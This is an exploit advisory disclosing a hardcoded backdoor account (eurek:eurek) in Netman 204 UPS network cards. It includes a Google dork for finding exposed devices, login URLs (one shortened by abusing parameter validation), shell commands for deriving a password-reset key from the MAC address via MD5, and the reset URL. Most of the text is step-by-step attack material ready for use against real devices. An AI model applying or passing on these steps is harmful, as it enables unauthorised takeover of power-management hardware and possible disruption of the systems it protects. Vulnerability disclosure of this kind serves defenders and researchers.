# Exploit Title: Netman 204 Backdoor and weak password recovery function
# Google Dork: intitle:"Netman 204 login"
# Date: 31st Jan 2017
# Exploit Author: Simon Gurney
# Vendor Homepage: blog.synack.co.uk
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
# Version: S14-1 and S15-2
# Tested on: Reillo UPS
# CVE : N/A
 
Netman 204 cards have a backdoor account eurek:eurek.
 
This account can be logged with by simply browsing to the URL
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
 
Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
 
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:
 
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
KEY=`echo .$NETMANID | md5sum | cut -c2-10`
 
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
Such as,
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
Then take characters 2-10, where position 1 is character 1 (not 0).
Such as,
354a65581
 
Then browse to the url:
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
or
https://[ip]/cgi-bin/recover2.cgi?password=354a65581
 
 
Passwords have now been reset.